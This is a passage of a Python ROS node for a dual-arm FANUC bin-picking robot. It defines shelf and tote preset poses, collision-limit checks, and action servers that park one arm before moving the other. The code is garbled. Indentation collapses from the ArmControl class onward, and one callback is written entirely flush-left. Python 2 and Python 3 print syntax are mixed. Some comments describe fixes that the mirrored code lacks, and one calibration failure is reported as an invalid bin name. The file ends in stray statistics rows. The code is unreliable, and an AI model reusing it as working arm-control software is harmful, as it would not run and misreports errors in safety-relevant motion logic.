        self.hosei = np.asarray([666-494, (-29)-(-181), 415-913+0, 0, 0, 0])
        self.lr = lr
        lr_offset = 0
        lr_roll = 0
        lr_yaw = 0
        if lr == 'right':
            lr_offset = 0

        self.preset_position = {}
        # Grid spacing: dy indexed by bin column, dz by bin row.
        dy = [0, -280, -560]
        dz = [0, -265, -494, -723]

        if lr == 'left':
            self.preset_position["bin_A_photo"] = np.asarray([775+0-50, lr_offset-102-20, 690, 180, -20, 179.9])
        else:
            self.preset_position["bin_A_photo"] = np.asarray([775+50, lr_offset-102-20, 720, 180, -20, 0])
        self._fill_bin_grid("photo", dy, dz)

        if lr == 'left':
            self.preset_position["bin_A_photo_r"] = np.asarray([810-50, lr_offset-356, 690, 180, -20, -160])
        else:
            self.preset_position["bin_A_photo_r"] = np.asarray([810, lr_offset-356, 720, 180, -20, 20])
        self._fill_bin_grid("photo_r", dy, dz)
        # Historical exception: bin C's right-photo pose is derived from the
        # plain photo pose with an extra yaw, not from bin_A_photo_r.
        self.preset_position["bin_C_photo_r"] = self.preset_position["bin_A_photo"] + np.asarray([0, dy[2], dz[0], 0, 0, -350])

        if lr == 'left':
            self.preset_position["bin_A_photo_l"] = np.asarray([810-50, lr_offset+114, 690, 180, -20, 160])
        else:
            self.preset_position["bin_A_photo_l"] = np.asarray([810, lr_offset+154, 720, 180, -20, -20])
        self._fill_bin_grid("photo_l", dy, dz)

        self.preset_position["bin_A_pre"] = np.asarray([550, lr_offset-102, 713, 180+lr_yaw, -0.1, 179.9+lr_roll])
        self._fill_bin_grid("pre", dy, dz)
        self.preset_position["bin_A_rpre"] = np.asarray([550, lr_offset-102, 713, -180, 0, 0])
        self._fill_bin_grid("rpre", dy, dz)
        # Bins G and J get an extra +50 on x for the front/pull families.
        self.preset_position["bin_A_front"] = np.asarray([432, lr_offset-87, 483, 90, -90, 90])
        self._fill_bin_grid("front", dy, dz, wide_x_bins="GJ")
        self.preset_position["bin_A_pull"] = np.asarray([432, lr_offset-87, 560-40, 90, -90, 90])  # TODO takasugi??
        self._fill_bin_grid("pull", dy, dz, wide_x_bins="GJ")

        self.preset_position["origin"] = np.asarray([550, lr_offset-146, 752, 180, 0, 180])
        self.preset_position["tote"] = np.asarray([800, 620, 260, -180, 0, 0])
        self.preset_position["tote_photo"] = np.asarray([800, 620, 260-30, 0, -90, -180])
        self.preset_position["tote_photo_xm"] = np.asarray([466, 620, 255-30, 0, -70, 180])
        self.preset_position["tote_photo_xp"] = np.asarray([1094, 620, 255-30, 180, -70, 0])
        self.preset_position["tote_photo_ym"] = np.asarray([800, 290, 255-30, -90, -70, -90])
        self.preset_position["tote_photo_yp"] = np.asarray([800, 980, 255-30, 90, -70, 90])
        self.preset_position["escape_right"] = np.asarray([258, -1337, 458, -179.9, 0.1, 114])
        self.preset_position["escape_left"] = np.asarray([599, 1164, 3, -177, -2, -173])

        # Last pose successfully sent; updated by send_msg_and_wait.
        self.current_position = None

        rospy.loginfo("action client start")
        print('move_arm_' + lr)
        self.action_client = actionlib.SimpleActionClient('move_arm_' + lr, RobotArmMoveGlobalAction)
        self.action_client.wait_for_server()
        rospy.loginfo("%s arm action ok" % lr)

    def _fill_bin_grid(self, suffix, dy, dz, wide_x_bins=""):
        """Derive bin_B..bin_L presets for `suffix` from the bin_A preset.

        Bins listed in wide_x_bins additionally get +50 on x.
        """
        base = self.preset_position["bin_A_" + suffix]
        for i in range(1, 12):
            letter = self._BIN_ORDER[i]
            dx = 50 if letter in wide_x_bins else 0
            self.preset_position["bin_%s_%s" % (letter, suffix)] = \
                base + np.asarray([dx, dy[i % 3], dz[i // 3], 0, 0, 0])

    @staticmethod
    def _outside(value, lim, label, verbose=True):
        """Return True if value lies outside [lim[0], lim[1]]; optionally print why."""
        if value < lim[0]:
            if verbose:
                print("rejected by %s< limit" % label)
            return True
        if value > lim[1]:
            if verbose:
                print("rejected by %s> limit" % label)
            return True
        return False

    # avoid collision between hand and shelf
    # inside_bin_check([1,2,3],'bin_C')
    @staticmethod
    def inside_bin_check(target, bin):
        """Return True if target [x,y,z,...] is safely inside `bin` (bin-local frame).

        NOTE(review): for a bin letter outside A..L the y/z limits are left
        unset and a NameError is raised, as in the original code.
        """
        bin_name = bin[-1]
        xlim = (0-1000, 445-600)  # (650, 1045) in the global frame
        if bin_name in ['A', 'D', 'G', 'J']:
            ylim = (-230, -15)
        elif bin_name in ['B', 'E', 'H', 'K']:
            ylim = (-285, -15)
        elif bin_name in ['C', 'F', 'I', 'L']:
            ylim = (-235, -15)
        if bin_name in ['A', 'B', 'C']:
            zlim = (20, 210)
        elif bin_name in ['D', 'E', 'F']:
            zlim = (20, 170)
        elif bin_name in ['G', 'H', 'I']:
            zlim = (20, 170)
        elif bin_name in ['J', 'K', 'L']:
            zlim = (20, 210)
        bad = LeftRight_arm._outside(target[0], xlim, 'x')
        bad = LeftRight_arm._outside(target[1], ylim, 'y') or bad
        bad = LeftRight_arm._outside(target[2], zlim, 'z') or bad
        return not bad

    # avoid collision between hand and tote
    # inside_tote_check([1,2,3])
    @staticmethod
    def inside_tote_check(target):
        """Return True if target [x,y,z,...] is safely inside the tote volume."""
        xlim = (650, 930)
        ylim = (390, 870)
        zlim = (-130, 200)
        bad = LeftRight_arm._outside(target[0], xlim, 'x')
        bad = LeftRight_arm._outside(target[1], ylim, 'y') or bad
        bad = LeftRight_arm._outside(target[2], zlim, 'z') or bad
        return not bad

    # avoid collision between hand and shelf
    # inside_bin_check_global([1,2,3],'bin_C')
    @staticmethod
    def inside_bin_check_global(target, bin):
        """Return True if target (global frame) is safely inside `bin`.

        Only the x rejection is printed; y/z rejections are silent (the
        original code had those prints commented out).
        """
        bin_name = bin[-1]
        xlim = (600, 1045)  # (650, 1045)
        if bin_name in ['A', 'D', 'G', 'J']:
            ylim = (-195, 7)
        elif bin_name in ['B', 'E', 'H', 'K']:
            ylim = (-495, -249)
        elif bin_name in ['C', 'F', 'I', 'L']:
            ylim = (-745, -554)
        if bin_name in ['A', 'B', 'C']:
            zlim = (392, 571)
        elif bin_name in ['D', 'E', 'F']:
            zlim = (162, 309)
        elif bin_name in ['G', 'H', 'I']:
            zlim = (-68, 82)
        elif bin_name in ['J', 'K', 'L']:
            zlim = (-331, -145)
        bad = LeftRight_arm._outside(target[0], xlim, 'x')
        bad = LeftRight_arm._outside(target[1], ylim, 'y', verbose=False) or bad
        bad = LeftRight_arm._outside(target[2], zlim, 'z', verbose=False) or bad
        return not bad

    # pos: numpy array (shape (6)) xyzwpr
    def send_msg_and_wait(self, pos, fut000=1, kakujiku=1):
        """Send one absolute move goal and block until the arm reaches it.

        pos: 6-vector [x, y, z, w, p, r].  fut000/kakujiku are motion-mode
        flags passed through to the FANUC driver (semantics defined there --
        TODO confirm).  Raises util.RobotTimeoutException on timeout,
        util.RobotActionFailure if the action does not succeed, and
        util.RobotMoveFailure if the driver reports failure.
        """
        print('send message to %s arm: %s' % (self.lr, pos))
        print('fut000= %s kakujiku = %s' % (fut000, kakujiku))
        goal = RobotArmMoveGlobalGoal(target=FanucTwist(
            Vector3(pos[0], pos[1], pos[2]),
            Vector3(pos[3], pos[4], pos[5]),
            fut000, kakujiku))
        self.action_client.send_goal(goal)
        done_before_timeout = self.action_client.wait_for_result(rospy.Duration.from_sec(1400.0))
        if not done_before_timeout:
            rospy.logerr("robot arm move did not finish in time")
            raise util.RobotTimeoutException(self.lr, goal)
        state = self.action_client.get_state()
        if state != GoalStatus.SUCCEEDED:
            rospy.logerr("robot move action did not finish correctly")
            raise util.RobotActionFailure(self.lr, goal, state)
        result = self.action_client.get_result()
        if not result.success:
            rospy.logerr("robot arm did not move correctly")
            raise util.RobotMoveFailure(self.lr, goal)
        rospy.loginfo("result %s status %s" % (result, state))
        self.current_position = pos

    # usage
    #   move_position('bin_A', pos='photo')
    def move_position(self, bin_name, fut000=1, kakujiku=1, pos=''):
        """Move to a named preset: 'origin', a tote pose, or '<bin_name>_<pos>'."""
        rospy.loginfo("move %s %s fut = %s kakujiku = %s" % (bin_name, pos, fut000, kakujiku))
        if bin_name == 'origin' or 'tote' in bin_name:
            key = bin_name
        else:
            key = '%s_%s' % (bin_name, pos)
        self.send_msg_and_wait(self.preset_position[key], fut000, kakujiku)

    # usage
    #   go_to_safe_area()
    def go_to_safe_area(self):
        """Retreat this arm out of the shared workspace and publish 'safe'."""
        rospy.loginfo("move %s arm to safe area" % (self.lr))
        if self.lr == 'right':
            self.send_msg_and_wait(self.preset_position['bin_F_pre'], 12, 0)
            self.send_msg_and_wait(self.preset_position['escape_right'], 12, 0)
        else:
            self.send_msg_and_wait(self.preset_position['bin_D_pre'], 12, 0)
            self.send_msg_and_wait(self.preset_position['escape_left'], 12, 0)
        msg = String()
        msg.data = "safe"
        self.pub.publish(msg)

    def return_from_safe_area(self):
        """Bring this arm back into the workspace and publish 'workspace'."""
        rospy.loginfo("move %s arm to work space" % (self.lr))
        if self.lr == 'right':
            self.send_msg_and_wait(self.preset_position['bin_F_pre'], 12, 1)
        else:
            self.send_msg_and_wait(self.preset_position['bin_D_pre'], 12, 1)
        msg = String()
        msg.data = "workspace"
        self.pub.publish(msg)
class ArmControl(object):
def __init__(self):
    """Bring up both arms and expose their move action servers.

    Per arm there are four actions: a low-level pose move in the bin frame
    ('move_to_<lr>'), a low-level global-frame move ('move_to_<lr>_global'),
    and high-level named-preset moves ('move_to_bin_<lr>[_global]').
    Blocks until the coordinate-transform services are available.
    """
    self.left = LeftRight_arm('left')
    self.right = LeftRight_arm('right')
    self.srv_lowlevel_left = \
        actionlib.SimpleActionServer('move_to_left',
                                     RobotArmMoveAction,
                                     execute_cb=self.cb_move_to_left,
                                     auto_start=False)
    self.srv_lowlevel_left_g = \
        actionlib.SimpleActionServer('move_to_left_global',
                                     RobotArmMoveGlobalAction,
                                     execute_cb=self.cb_move_to_left_global,
                                     auto_start=False)
    self.srv_highlevel_left = \
        actionlib.SimpleActionServer('move_to_bin_left',
                                     BinToteMoveAction,
                                     execute_cb=self.cb_move_to_bin_left,
                                     auto_start=False)
    self.srv_highlevel_left_g = \
        actionlib.SimpleActionServer('move_to_bin_left_global',
                                     BinToteMoveAction,
                                     execute_cb=self.cb_move_to_bin_left_global,
                                     auto_start=False)
    self.srv_lowlevel_right = \
        actionlib.SimpleActionServer('move_to_right',
                                     RobotArmMoveAction,
                                     execute_cb=self.cb_move_to_right,
                                     auto_start=False)
    self.srv_lowlevel_right_g = \
        actionlib.SimpleActionServer('move_to_right_global',
                                     RobotArmMoveGlobalAction,
                                     execute_cb=self.cb_move_to_right_global,
                                     auto_start=False)
    self.srv_highlevel_right = \
        actionlib.SimpleActionServer('move_to_bin_right',
                                     BinToteMoveAction,
                                     execute_cb=self.cb_move_to_bin_right,
                                     auto_start=False)
    self.srv_highlevel_right_g = \
        actionlib.SimpleActionServer('move_to_bin_right_global',
                                     BinToteMoveAction,
                                     execute_cb=self.cb_move_to_bin_right_global,
                                     auto_start=False)
    # Start the servers only after every callback is wired up.
    self.srv_lowlevel_left.start()
    self.srv_lowlevel_left_g.start()
    self.srv_highlevel_left.start()
    self.srv_highlevel_left_g.start()
    self.srv_lowlevel_right.start()
    self.srv_lowlevel_right_g.start()
    self.srv_highlevel_right.start()
    self.srv_highlevel_right_g.start()
    rospy.loginfo("initialize node")
    # Wait for the calibration / coordinate-transform services.
    rospy.wait_for_service('global2bin')
    rospy.wait_for_service('bin2global')
    rospy.wait_for_service('adjustglobal')
    rospy.wait_for_service('check_is_calibrated')
    # (fixed typo: was 'raeday')
    rospy.loginfo('ready to use coord transform service')
    self.global2bin = rospy.ServiceProxy('global2bin', CoordinateTransform)
    self.bin2global = rospy.ServiceProxy('bin2global', CoordinateTransform)
    self.adjustglobal = rospy.ServiceProxy('adjustglobal', CoordinateTransform)
    self.checkcalib = rospy.ServiceProxy('check_is_calibrated', CalibData)
    # Last workspace/safe state reported by each arm on its state topic.
    self.r_state = ""
    self.l_state = ""
    self.sub_l = rospy.Subscriber('left_state', String, self.cb_left_movement)
    self.sub_r = rospy.Subscriber('right_state', String, self.cb_right_movement)
def twist2str(self, t):
    """Format a twist-like message for logging.

    Includes the FanucTwist-only fut000/kakujiku fields when present; a plain
    geometry_msgs Twist lacks them, which is the only case the fallback is for
    (was a bare `except:` that would also hide unrelated errors).
    """
    try:
        return "lin:(%s, %s, %s)/ang:(%s, %s, %s)/fut000:%s/k:%s" % (t.linear.x,
                                                                     t.linear.y,
                                                                     t.linear.z,
                                                                     t.angular.x,
                                                                     t.angular.y,
                                                                     t.angular.z,
                                                                     t.fut000,
                                                                     t.kakujiku)
    except AttributeError:
        return "lin:(%s, %s, %s)/ang:(%s, %s, %s)" % (t.linear.x,
                                                      t.linear.y,
                                                      t.linear.z,
                                                      t.angular.x,
                                                      t.angular.y,
                                                      t.angular.z)
def cb_left_movement(self, message):
    """left_state topic callback: record the left arm's reported state."""
    state = message.data
    rospy.loginfo("SET LEFT STATE TO " + state)
    self.l_state = state
def cb_right_movement(self, message):
    """right_state topic callback: record the right arm's reported state."""
    state = message.data
    rospy.loginfo("SET RIGHT STATE TO " + state)
    self.r_state = state
def left_preparation(self):
    # Make the shared workspace safe for a left-arm move: first park the
    # right arm if it is still in the workspace, then bring the left arm
    # back in if it is parked.  Order matters -- both arms must never
    # occupy the workspace at the same time.
    if self.r_state == 'workspace':
        rospy.loginfo('move right arm')
        self.right.go_to_safe_area()
    if self.l_state == 'safe':
        rospy.loginfo('move left arm')
        self.left.return_from_safe_area()
def right_preparation(self):
    """Make the shared workspace safe for a right-arm move.

    Park the left arm first if it occupies the workspace, then bring the
    right arm back in.  Loginfo calls added for consistency with
    left_preparation; dead commented-out `return` removed.
    """
    if self.l_state == 'workspace':
        rospy.loginfo('move left arm')
        self.left.go_to_safe_area()
    if self.r_state == 'safe':
        rospy.loginfo('move right arm')
        self.right.return_from_safe_area()
#RobotArmMove bin, target(twist) -> success
def cb_move_to_left(self, goal):
print "move_to_left:", self.twist2str(goal.target)
try:
self.left_preparation()
except Exception as e:
errmsg = "exception during left_preparation: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveResult(success=False)
self.srv_lowlevel_left.set_aborted(result, errmsg)
return
r = self.bin2global(bin = goal.bin, point=goal.target)
if not r.is_calibrated:
raise util.RobotNotCalibrated("left", str(goal.target))
t = r.point
pos = [t.linear.x, t.linear.y, t.linear.z, t.angular.x, t.angular.y, t.angular.z]
print 'go to', pos
try:
self.left.send_msg_and_wait(pos,goal.target.fut000,goal.target.kakujiku)
except Exception as e:
errmsg = "exception during send_msg_and_wait: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveResult(success=False)
self.srv_lowlevel_left.set_aborted(result, errmsg)
return
if r.success == True:
result = RobotArmMoveResult(success=True)
self.srv_lowlevel_left.set_succeeded(result)
else:
result = RobotArmMoveResult(success=False)
self.srv_lowlevel_left.set_aborted(result,"Cannot convert position")
#RobotArmMoveGlobal target(twist)->success
def cb_move_to_left_global(self, goal):
print "move_to_left_global:", self.twist2str(goal.target)
try:
self.left_preparation()
except Exception as e:
errmsg = "exception during left_preparation: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveGlobalResult(success=False)
self.srv_lowlevel_left_g.set_aborted(result, errmsg)
return
t = goal.target
pos = [t.linear.x, t.linear.y, t.linear.z, t.angular.x, t.angular.y, t.angular.z]
try:
self.left.send_msg_and_wait(pos,goal.target.fut000,goal.target.kakujiku)
except Exception as e:
errmsg = "exception during send_msg_and_wait: %s" % e
rospy.logerr(errmsg)
result = RobotArmMoveGlobalResult(success=False)
self.srv_lowlevel_left_g.set_aborted(result, errmsg)
return
result = RobotArmMoveGlobalResult(success=True)
self.srv_lowlevel_left_g.set_succeeded(result)
#BinToteMove bin,position(string)->success,position(twist),is_calibrated,globaL_position
def cb_move_to_bin_left(self, goal):
    """BinToteMove action: move the left arm to a named preset.

    goal.bin is a tote name or 'bin_A'..'bin_L'; goal.position selects the
    preset family (photo/pre/rpre/front/pull/...), defaulting to 'photo'.
    Replies with the global pose and, for shelf bins, the bin-local pose
    plus calibration status.
    """
    try:
        self.left_preparation()
    except Exception as e:
        errmsg = "exception during left_preparation: %s" % e
        rospy.logerr(errmsg)
        result = BinToteMoveResult(success=False)
        self.srv_highlevel_left.set_aborted(result, errmsg)
        return
    if 'tote' not in goal.bin and goal.bin not in ['bin_'+ j for j in 'ABCDEFGHIJKL']:
        result = BinToteMoveResult(success=False)
        self.srv_highlevel_left.set_aborted(result,'Invalid bin name')
    else:
        if 'tote' in goal.bin:
            # Tote targets are preset poses; no calibration adjustment applied.
            try:
                if goal.position in ['photo', 'photo_down','photo_xm','photo_xp','photo_ym','photo_yp']:
                    pos = self.left.preset_position['tote_' + goal.position]
                    self.left.move_position('tote_' + goal.position, goal.fut000, goal.kakujiku)
                else:
                    # Any other position name falls back to the plain tote pose.
                    pos = self.left.preset_position['tote']
                    self.left.move_position('tote', goal.fut000, goal.kakujiku)
            except Exception as e:
                errmsg = "exception during move_position: %s" % e
                rospy.logerr(errmsg)
                result = BinToteMoveResult(success=False)
                self.srv_highlevel_left.set_aborted(result, errmsg)
                return
            p = Vector3(pos[0], pos[1], pos[2])
            r = Vector3(pos[3], pos[4], pos[5])
            is_calib = self.checkcalib()
            # For totes global and bin-local poses are the same twist.
            result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=is_calib.success, position=Twist(p, r))
            self.srv_highlevel_left.set_succeeded(result)
        else:
            # Map 'left'/'right' aliases onto the photo_l/photo_r presets;
            # anything unrecognised defaults to 'photo'.
            if goal.position in ['photo', 'pre', 'rpre', 'photo_l', 'photo_r', 'front', 'right', 'left', 'pull']:
                if goal.position == 'left':
                    po = 'photo_l'
                elif goal.position == 'right':
                    po = 'photo_r'
                else:
                    po = goal.position
            else:
                po = "photo"
            name = goal.bin + '_' + po
            pos = self.left.preset_position[name]
            print "looking up position for %s/%s" % (goal.bin, pos)
            p = Vector3(pos[0], pos[1], pos[2])
            r = Vector3(pos[3], pos[4], pos[5])
            # Apply the calibration correction to the preset global pose.
            res = self.adjustglobal(bin='',point=Twist(p,r))
            if res.is_calibrated == False:
                result = BinToteMoveResult(success=False)
                self.srv_highlevel_left.set_aborted(result, 'No calibration yet')
            else:
                apos = [res.point.linear.x, res.point.linear.y, res.point.linear.z, res.point.angular.x, res.point.angular.y, res.point.angular.z]
                try:
                    self.left.send_msg_and_wait(apos,goal.fut000,goal.kakujiku)
                except Exception as e:
                    errmsg = "exception during send_msg_and_wait: %s" % e
                    rospy.logerr(errmsg)
                    result = BinToteMoveResult(success=False)
                    self.srv_highlevel_left.set_aborted(result, errmsg)
                    return
                p = Vector3(apos[0], apos[1], apos[2])
                r = Vector3(apos[3], apos[4], apos[5])
                # Report the reached pose both globally and in the bin frame.
                pos = self.global2bin(bin=goal.bin, point=Twist(p,r))
                result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=pos.is_calibrated, position=pos.point)
                self.srv_highlevel_left.set_succeeded(result)
#BinToteMove bin, position->success, position
def cb_move_to_bin_left_global(self, goal):
    """BinToteMove action (global frame): move the left arm to a preset pose.

    Unlike cb_move_to_bin_left, the preset is used as-is with no calibration
    adjustment.  Two bugs fixed: the tote branch called the non-existent
    self.check_calib() (the proxy is stored as self.checkcalib in __init__),
    and it replied on srv_highlevel_left instead of this action's own
    srv_highlevel_left_g server, after which the tail code issued a second
    set_succeeded on the _g server.
    """
    try:
        self.left_preparation()
    except Exception as e:
        errmsg = "exception during left_preparation: %s" % e
        rospy.logerr(errmsg)
        result = BinToteMoveResult(success=False)
        self.srv_highlevel_left_g.set_aborted(result, errmsg)
        return
    try:
        if 'tote' in goal.bin:
            if goal.position in ['photo', 'photo_down','photo_xm','photo_xp','photo_ym','photo_yp']:
                pos = self.left.preset_position['tote_' + goal.position]
                self.left.move_position('tote_' + goal.position, goal.fut000, goal.kakujiku)
            else:
                pos = self.left.preset_position['tote']
                self.left.move_position('tote', goal.fut000, goal.kakujiku)
            p = Vector3(pos[0], pos[1], pos[2])
            r = Vector3(pos[3], pos[4], pos[5])
            # was: self.check_calib() -- AttributeError at runtime
            is_calib = self.checkcalib()
            result = BinToteMoveResult(success=True, global_position=Twist(p, r),
                                       is_calibrated=is_calib.success, position=Twist(p, r))
            # reply on this action's own server and stop here so the tail
            # below cannot set_succeeded a second time
            self.srv_highlevel_left_g.set_succeeded(result)
            return
        else:
            # Map 'left'/'right' aliases onto photo_l/photo_r; default 'photo'.
            if goal.position in ['photo', 'pre', 'rpre', 'photo_l', 'photo_r', 'front', 'right', 'left', 'pull']:
                if goal.position == 'left':
                    po = 'photo_l'
                elif goal.position == 'right':
                    po = 'photo_r'
                else:
                    po = goal.position
            else:
                po = "photo"
            name = goal.bin + '_' + po
            pos = self.left.preset_position[name]
            self.left.move_position(goal.bin, goal.fut000, goal.kakujiku, po)
    except Exception as e:
        errmsg = "exception during move_position: %s" % e
        rospy.logerr(errmsg)
        result = BinToteMoveResult(success=False)
        self.srv_highlevel_left_g.set_aborted(result, errmsg)
        return
    print("looking up position for %s/%s" % (goal.bin, pos))
    p = Vector3(pos[0], pos[1], pos[2])
    r = Vector3(pos[3], pos[4], pos[5])
    result = BinToteMoveResult(success=True, global_position=Twist(p, r))
    self.srv_highlevel_left_g.set_succeeded(result)
#RobotArmMove bin, target(twist) -> success
def cb_move_to_right(self, goal):
    """RobotArmMove action: move the right arm to a bin-local target pose.

    Bug fixed: the not-calibrated exception was raised with the arm label
    "left" (copy-paste from cb_move_to_left); this is the right arm.
    """
    print("move_to_right: %s" % self.twist2str(goal.target))
    try:
        self.right_preparation()
    except Exception as e:
        errmsg = "exception during right_preparation: %s" % e
        rospy.logerr(errmsg)
        result = RobotArmMoveResult(success=False)
        self.srv_lowlevel_right.set_aborted(result, errmsg)
        return
    # Convert the bin-local target into the global frame.
    r = self.bin2global(bin=goal.bin, point=goal.target)
    if not r.is_calibrated:
        raise util.RobotNotCalibrated("right", str(goal.target))
    t = r.point
    pos = [t.linear.x, t.linear.y, t.linear.z, t.angular.x, t.angular.y, t.angular.z]
    print('go to %s' % pos)
    try:
        self.right.send_msg_and_wait(pos, goal.target.fut000, goal.target.kakujiku)
    except Exception as e:
        errmsg = "exception during send_msg_and_wait: %s" % e
        rospy.logerr(errmsg)
        result = RobotArmMoveResult(success=False)
        self.srv_lowlevel_right.set_aborted(result, errmsg)
        return
    if r.success == True:
        result = RobotArmMoveResult(success=True)
        self.srv_lowlevel_right.set_succeeded(result)
    else:
        result = RobotArmMoveResult(success=False)
        self.srv_lowlevel_right.set_aborted(result, "Cannot convert position")
#RobotArmMoveGlobal target(twist)->success
def cb_move_to_right_global(self, goal):
    """Action callback: move the right arm to a pose given directly in
    global coordinates (no bin-local conversion, no calibration check)."""
    print "move_to_right_global:", self.twist2str(goal.target)
    try:
        self.right_preparation()
    except Exception as e:
        errmsg = "exception during right_preparation: %s" % e
        rospy.logerr(errmsg)
        result = RobotArmMoveGlobalResult(success=False)
        self.srv_lowlevel_right_g.set_aborted(result, errmsg)
        return
    t = goal.target
    # Flatten the Twist into the 6-element [x, y, z, rx, ry, rz] list the
    # low-level driver expects.
    pos = [t.linear.x, t.linear.y, t.linear.z, t.angular.x, t.angular.y, t.angular.z]
    try:
        self.right.send_msg_and_wait(pos,goal.target.fut000,goal.target.kakujiku)
    except Exception as e:
        errmsg = "exception during send_msg_and_wait: %s" % e
        rospy.logerr(errmsg)
        result = RobotArmMoveGlobalResult(success=False)
        self.srv_lowlevel_right_g.set_aborted(result, errmsg)
        return
    result = RobotArmMoveGlobalResult(success=True)
    self.srv_lowlevel_right_g.set_succeeded(result)
#BinToteMove bin,position(string)->success,position(twist),is_calibrated,globaL_position
def cb_move_to_bin_right(self, goal):
    """Action callback: move the right arm to a named preset pose of a bin
    or tote.

    goal.bin is either a tote name (contains 'tote') or one of
    'bin_A'..'bin_L'; goal.position selects the preset.  For bins, the
    preset pose is calibration-adjusted before moving and the result also
    carries the bin-local pose.
    """
    try:
        self.right_preparation()
    except Exception as e:
        errmsg = "exception during right_preparation: %s" % e
        rospy.logerr(errmsg)
        result = BinToteMoveResult(success=False)
        self.srv_highlevel_right.set_aborted(result, errmsg)
        return
    # Reject anything that is neither a tote nor one of the twelve bins.
    if 'tote' not in goal.bin and goal.bin not in ['bin_'+ j for j in 'ABCDEFGHIJKL']:
        result = BinToteMoveResult(success=False)
        self.srv_highlevel_right.set_aborted(result,'Invalid bin name')
    else:
        if 'tote' in goal.bin:
            try:
                # Known tote presets get their own entry; anything else
                # falls back to the plain 'tote' pose.
                if goal.position in ['photo', 'photo_down','photo_xm','photo_xp','photo_ym','photo_yp']:
                    pos = self.right.preset_position['tote_' + goal.position]
                    self.right.move_position('tote_' + goal.position, goal.fut000, goal.kakujiku)
                else:
                    pos = self.right.preset_position['tote']
                    self.right.move_position('tote', goal.fut000, goal.kakujiku)
            except Exception as e:
                errmsg = "exception during move_position: %s" % e
                rospy.logerr(errmsg)
                result = BinToteMoveResult(success=False)
                self.srv_highlevel_right.set_aborted(result, errmsg)
                return
            p = Vector3(pos[0], pos[1], pos[2])
            r = Vector3(pos[3], pos[4], pos[5])
            is_calib = self.checkcalib()
            # NOTE(review): for tote goals position and global_position are
            # the same pose — presumably tote presets are already global.
            result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=is_calib.success, position=Twist(p, r))
            self.srv_highlevel_right.set_succeeded(result)
        else:
            # Map the requested position onto a preset suffix: 'left' and
            # 'right' alias the photo poses, unknown names fall back to
            # 'photo'.
            if goal.position in ['photo', 'pre', 'rpre', 'photo_l', 'photo_r', 'front', 'right', 'left', 'pull']:
                if goal.position == 'left':
                    po = 'photo_l'
                elif goal.position == 'right':
                    po = 'photo_r'
                else:
                    po = goal.position
            else:
                po = "photo"
            name = goal.bin + '_' + po
            pos = self.right.preset_position[name]
            print "looking up position for %s/%s" % (goal.bin, pos)
            p = Vector3(pos[0], pos[1], pos[2])
            r = Vector3(pos[3], pos[4], pos[5])
            # Apply the calibration offset to the preset pose.
            res = self.adjustglobal(bin='',point=Twist(p,r))
            if res.is_calibrated == False:
                result = BinToteMoveResult(success=False)
                self.srv_highlevel_right.set_aborted(result, 'Invalid bin name')
            else:
                apos = [res.point.linear.x, res.point.linear.y, res.point.linear.z, res.point.angular.x, res.point.angular.y, res.point.angular.z]
                try:
                    self.right.send_msg_and_wait(apos,goal.fut000,goal.kakujiku)
                except Exception as e:
                    errmsg = "exception during send_msg_and_wait: %s" % e
                    rospy.logerr(errmsg)
                    result = BinToteMoveResult(success=False)
                    self.srv_highlevel_right.set_aborted(result, errmsg)
                    return
                print "looking up position for %s/%s" % (goal.bin, pos)
                p = Vector3(apos[0], apos[1], apos[2])
                r = Vector3(apos[3], apos[4], apos[5])
                # Convert the adjusted global pose back into bin-local
                # coordinates for the result message.
                pos = self.global2bin(bin=goal.bin, point=Twist(p,r))
                result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=pos.is_calibrated, position=pos.point)
                self.srv_highlevel_right.set_succeeded(result)
#BinToteMove bin, position->success, position
def cb_move_to_bin_right_global(self, goal):
    """Action callback: move the right arm to a named preset of a bin or
    tote and report the preset pose in global coordinates.

    Unlike cb_move_to_bin_right, no calibration adjustment is applied.
    """
    print 'goal = ', goal
    print "moving away left arm, then moving right arm:"
    try:
        self.right_preparation()
    except Exception as e:
        errmsg = "exception during right_preparation: %s" % e
        rospy.logerr(errmsg)
        result = BinToteMoveResult(success=False)
        self.srv_highlevel_right_g.set_aborted(result, errmsg)
        return
    try:
        if 'tote' in goal.bin:
            # Tote goals: pick the matching preset (or the plain 'tote'
            # pose) and move immediately.
            if goal.position in ['photo', 'photo_down','photo_xm','photo_xp','photo_ym','photo_yp']:
                pos = self.right.preset_position['tote_' + goal.position]
                self.right.move_position('tote_' + goal.position, goal.fut000, goal.kakujiku)
            else:
                pos = self.right.preset_position['tote']
                self.right.move_position('tote', goal.fut000, goal.kakujiku)
            p = Vector3(pos[0], pos[1], pos[2])
            r = Vector3(pos[3], pos[4], pos[5])
            is_calib = self.checkcalib()
            result = BinToteMoveResult(success=True, global_position=Twist(p, r),is_calibrated=is_calib.success, position=Twist(p, r))
            # NOTE(review): for tote goals set_succeeded is called here AND
            # again at the bottom of this callback after the try block —
            # the second call looks redundant; confirm against actionlib
            # server semantics.
            self.srv_highlevel_right_g.set_succeeded(result)
        else:
            # Bin goals: map the requested position onto a preset suffix
            # ('left'/'right' alias the photo poses, unknown names fall
            # back to 'photo').
            if goal.position in ['photo', 'pre', 'rpre', 'photo_l', 'photo_r', 'front', 'right', 'left', 'pull']:
                if goal.position == 'left':
                    po = 'photo_l'
                elif goal.position == 'right':
                    po = 'photo_r'
                else:
                    po = goal.position
            else:
                po = "photo"
            name = goal.bin + '_' + po
            pos = self.right.preset_position[name]
            self.right.move_position(goal.bin, goal.fut000, goal.kakujiku, po)
    except Exception as e:
        errmsg = "exception during move_position: %s" % e
        rospy.logerr(errmsg)
        result = BinToteMoveResult(success=False)
        self.srv_highlevel_right_g.set_aborted(result, errmsg)
        return
    print "looking up position for %s/%s" % (goal.bin, pos)
    p = Vector3(pos[0], pos[1], pos[2])
    r = Vector3(pos[3], pos[4], pos[5])
    result = BinToteMoveResult(success=True, global_position=Twist(p, r))
    self.srv_highlevel_right_g.set_succeeded(result)
if __name__ == '__main__':
    # Entry point: start the arm_control ROS node and serve the action
    # callbacks until shutdown.
    rospy.init_node("arm_control", anonymous=True)
    a = ArmControl()
    rospy.spin()
| 51.128588
| 150
| 0.563964
| 5,861
| 44,533
| 4.075073
| 0.069101
| 0.115475
| 0.139424
| 0.148593
| 0.836627
| 0.800955
| 0.765701
